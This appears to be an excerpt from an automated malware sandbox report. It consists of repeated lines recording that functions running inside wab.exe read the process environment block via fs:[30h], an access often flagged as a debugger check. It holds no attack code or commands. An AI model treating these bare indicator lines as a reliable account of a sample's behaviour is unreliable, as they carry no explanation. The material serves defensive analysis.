Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B2D3 mov eax, dword ptr fs:[00000030h] 20_2_2241B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B2D3 mov eax, dword ptr fs:[00000030h] 20_2_2241B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B2D3 mov eax, dword ptr fs:[00000030h] 20_2_2241B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244F2D0 mov eax, dword ptr fs:[00000030h] 20_2_2244F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244F2D0 mov eax, dword ptr fs:[00000030h] 20_2_2244F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224302E1 mov eax, dword ptr fs:[00000030h] 20_2_224302E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224302E1 mov eax, dword ptr fs:[00000030h] 20_2_224302E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224302E1 mov eax, dword ptr fs:[00000030h] 20_2_224302E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F52E2 mov eax, dword ptr fs:[00000030h] 20_2_224F52E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DF2F8 mov eax, dword ptr fs:[00000030h] 20_2_224DF2F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224192FF mov eax, dword ptr fs:[00000030h] 20_2_224192FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245E284 mov eax, dword ptr fs:[00000030h] 20_2_2245E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245E284 mov eax, dword ptr fs:[00000030h] 20_2_2245E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A0283 mov eax, dword ptr fs:[00000030h] 20_2_224A0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A0283 mov eax, dword ptr fs:[00000030h] 20_2_224A0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A0283 mov eax, dword ptr fs:[00000030h] 20_2_224A0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F5283 mov eax, dword ptr fs:[00000030h] 20_2_224F5283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245329E mov eax, dword ptr fs:[00000030h] 20_2_2245329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245329E mov eax, dword ptr fs:[00000030h] 20_2_2245329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224302A0 mov eax, dword ptr fs:[00000030h] 20_2_224302A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224302A0 mov eax, dword ptr fs:[00000030h] 20_2_224302A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224352A0 mov eax, dword ptr fs:[00000030h] 20_2_224352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224352A0 mov eax, dword ptr fs:[00000030h] 20_2_224352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224352A0 mov eax, dword ptr fs:[00000030h] 20_2_224352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224352A0 mov eax, dword ptr fs:[00000030h] 20_2_224352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E92A6 mov eax, dword ptr fs:[00000030h] 20_2_224E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E92A6 mov eax, dword ptr fs:[00000030h] 20_2_224E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E92A6 mov eax, dword ptr fs:[00000030h] 20_2_224E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E92A6 mov eax, dword ptr fs:[00000030h] 20_2_224E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B72A0 mov eax, dword ptr fs:[00000030h] 20_2_224B72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B72A0 mov eax, dword ptr fs:[00000030h] 20_2_224B72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h] 20_2_224B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B62A0 mov ecx, dword ptr fs:[00000030h] 20_2_224B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h] 20_2_224B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h] 20_2_224B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h] 20_2_224B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h] 20_2_224B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A92BC mov eax, dword ptr fs:[00000030h] 20_2_224A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A92BC mov eax, dword ptr fs:[00000030h] 20_2_224A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A92BC mov ecx, dword ptr fs:[00000030h] 20_2_224A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A92BC mov ecx, dword ptr fs:[00000030h] 20_2_224A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241D34C mov eax, dword ptr fs:[00000030h] 20_2_2241D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241D34C mov eax, dword ptr fs:[00000030h] 20_2_2241D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F5341 mov eax, dword ptr fs:[00000030h] 20_2_224F5341
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419353 mov eax, dword ptr fs:[00000030h] 20_2_22419353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419353 mov eax, dword ptr fs:[00000030h] 20_2_22419353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A035C mov eax, dword ptr fs:[00000030h] 20_2_224A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A035C mov eax, dword ptr fs:[00000030h] 20_2_224A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A035C mov eax, dword ptr fs:[00000030h] 20_2_224A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A035C mov ecx, dword ptr fs:[00000030h] 20_2_224A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A035C mov eax, dword ptr fs:[00000030h] 20_2_224A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A035C mov eax, dword ptr fs:[00000030h] 20_2_224A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EA352 mov eax, dword ptr fs:[00000030h] 20_2_224EA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DF367 mov eax, dword ptr fs:[00000030h] 20_2_224DF367
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224C437C mov eax, dword ptr fs:[00000030h] 20_2_224C437C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22427370 mov eax, dword ptr fs:[00000030h] 20_2_22427370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22427370 mov eax, dword ptr fs:[00000030h] 20_2_22427370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22427370 mov eax, dword ptr fs:[00000030h] 20_2_22427370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A930B mov eax, dword ptr fs:[00000030h] 20_2_224A930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A930B mov eax, dword ptr fs:[00000030h] 20_2_224A930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A930B mov eax, dword ptr fs:[00000030h] 20_2_224A930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A30B mov eax, dword ptr fs:[00000030h] 20_2_2245A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A30B mov eax, dword ptr fs:[00000030h] 20_2_2245A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A30B mov eax, dword ptr fs:[00000030h] 20_2_2245A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241C310 mov ecx, dword ptr fs:[00000030h] 20_2_2241C310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22440310 mov ecx, dword ptr fs:[00000030h] 20_2_22440310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E132D mov eax, dword ptr fs:[00000030h] 20_2_224E132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E132D mov eax, dword ptr fs:[00000030h] 20_2_224E132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244F32A mov eax, dword ptr fs:[00000030h] 20_2_2244F32A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22417330 mov eax, dword ptr fs:[00000030h] 20_2_22417330
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DC3CD mov eax, dword ptr fs:[00000030h] 20_2_224DC3CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h] 20_2_2242A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h] 20_2_2242A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h] 20_2_2242A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h] 20_2_2242A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h] 20_2_2242A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h] 20_2_2242A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224283C0 mov eax, dword ptr fs:[00000030h] 20_2_224283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224283C0 mov eax, dword ptr fs:[00000030h] 20_2_224283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224283C0 mov eax, dword ptr fs:[00000030h] 20_2_224283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224283C0 mov eax, dword ptr fs:[00000030h] 20_2_224283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A63C0 mov eax, dword ptr fs:[00000030h] 20_2_224A63C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DB3D0 mov ecx, dword ptr fs:[00000030h] 20_2_224DB3D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DF3E6 mov eax, dword ptr fs:[00000030h] 20_2_224DF3E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F53FC mov eax, dword ptr fs:[00000030h] 20_2_224F53FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E3F0 mov eax, dword ptr fs:[00000030h] 20_2_2243E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E3F0 mov eax, dword ptr fs:[00000030h] 20_2_2243E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E3F0 mov eax, dword ptr fs:[00000030h] 20_2_2243E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224563FF mov eax, dword ptr fs:[00000030h] 20_2_224563FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241E388 mov eax, dword ptr fs:[00000030h] 20_2_2241E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241E388 mov eax, dword ptr fs:[00000030h] 20_2_2241E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241E388 mov eax, dword ptr fs:[00000030h] 20_2_2241E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244438F mov eax, dword ptr fs:[00000030h] 20_2_2244438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244438F mov eax, dword ptr fs:[00000030h] 20_2_2244438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F539D mov eax, dword ptr fs:[00000030h] 20_2_224F539D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22418397 mov eax, dword ptr fs:[00000030h] 20_2_22418397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22418397 mov eax, dword ptr fs:[00000030h] 20_2_22418397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22418397 mov eax, dword ptr fs:[00000030h] 20_2_22418397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2247739A mov eax, dword ptr fs:[00000030h] 20_2_2247739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2247739A mov eax, dword ptr fs:[00000030h] 20_2_2247739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224433A5 mov eax, dword ptr fs:[00000030h] 20_2_224433A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224533A0 mov eax, dword ptr fs:[00000030h] 20_2_224533A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224533A0 mov eax, dword ptr fs:[00000030h] 20_2_224533A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22422050 mov eax, dword ptr fs:[00000030h] 20_2_22422050
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224C705E mov ebx, dword ptr fs:[00000030h] 20_2_224C705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224C705E mov eax, dword ptr fs:[00000030h] 20_2_224C705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B052 mov eax, dword ptr fs:[00000030h] 20_2_2244B052
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A6050 mov eax, dword ptr fs:[00000030h] 20_2_224A6050
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A106E mov eax, dword ptr fs:[00000030h] 20_2_224A106E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F5060 mov eax, dword ptr fs:[00000030h] 20_2_224F5060
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov ecx, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244C073 mov eax, dword ptr fs:[00000030h] 20_2_2244C073
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249D070 mov ecx, dword ptr fs:[00000030h] 20_2_2249D070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A4000 mov ecx, dword ptr fs:[00000030h] 20_2_224A4000
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E016 mov eax, dword ptr fs:[00000030h] 20_2_2243E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E016 mov eax, dword ptr fs:[00000030h] 20_2_2243E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E016 mov eax, dword ptr fs:[00000030h] 20_2_2243E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E016 mov eax, dword ptr fs:[00000030h] 20_2_2243E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241A020 mov eax, dword ptr fs:[00000030h] 20_2_2241A020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241C020 mov eax, dword ptr fs:[00000030h] 20_2_2241C020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E903E mov eax, dword ptr fs:[00000030h] 20_2_224E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E903E mov eax, dword ptr fs:[00000030h] 20_2_224E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E903E mov eax, dword ptr fs:[00000030h] 20_2_224E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E903E mov eax, dword ptr fs:[00000030h] 20_2_224E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov ecx, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov ecx, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov ecx, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov ecx, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249D0C0 mov eax, dword ptr fs:[00000030h] 20_2_2249D0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249D0C0 mov eax, dword ptr fs:[00000030h] 20_2_2249D0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A20DE mov eax, dword ptr fs:[00000030h] 20_2_224A20DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F50D9 mov eax, dword ptr fs:[00000030h] 20_2_224F50D9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224490DB mov eax, dword ptr fs:[00000030h] 20_2_224490DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224450E4 mov eax, dword ptr fs:[00000030h] 20_2_224450E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224450E4 mov ecx, dword ptr fs:[00000030h] 20_2_224450E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241A0E3 mov ecx, dword ptr fs:[00000030h] 20_2_2241A0E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A60E0 mov eax, dword ptr fs:[00000030h] 20_2_224A60E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224280E9 mov eax, dword ptr fs:[00000030h] 20_2_224280E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241C0F0 mov eax, dword ptr fs:[00000030h] 20_2_2241C0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224620F0 mov ecx, dword ptr fs:[00000030h] 20_2_224620F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242208A mov eax, dword ptr fs:[00000030h] 20_2_2242208A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224AD080 mov eax, dword ptr fs:[00000030h] 20_2_224AD080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224AD080 mov eax, dword ptr fs:[00000030h] 20_2_224AD080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241D08D mov eax, dword ptr fs:[00000030h] 20_2_2241D08D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22425096 mov eax, dword ptr fs:[00000030h] 20_2_22425096
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244D090 mov eax, dword ptr fs:[00000030h] 20_2_2244D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244D090 mov eax, dword ptr fs:[00000030h] 20_2_2244D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245909C mov eax, dword ptr fs:[00000030h] 20_2_2245909C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B80A8 mov eax, dword ptr fs:[00000030h] 20_2_224B80A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E60B8 mov eax, dword ptr fs:[00000030h] 20_2_224E60B8
